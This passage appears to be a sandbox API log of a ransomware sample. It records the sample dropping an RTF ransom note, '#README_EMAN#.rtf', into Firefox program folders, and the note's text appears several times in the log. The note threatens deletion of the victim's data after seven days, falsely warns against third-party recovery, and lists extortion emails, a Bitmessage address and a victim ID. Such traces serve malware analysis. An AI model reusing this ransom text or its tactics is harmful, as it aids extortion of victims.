w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\\\x1e4=a\x99ª\x8d\\Ë\x04`\x1b\x1ehG(\"…ê\x19Ö0\x03ã\x08", lpUsedDefaultChar=0x0) returned 8717 [0220.382] WriteFile (in: hFile=0x2d0, lpBuffer=0x38dfac8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x38dfac8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0220.383] CloseHandle (hObject=0x2d0) returned 1 [0220.383] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\features\\#readme_eman#.rtf")) returned 0x20 [0220.383] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\visualelements\\#readme_eman#.rtf")) returned 0xffffffff [0220.383] GetLastError () returned 0x2 [0220.383] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\visualelements\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0220.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x38dfac8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. 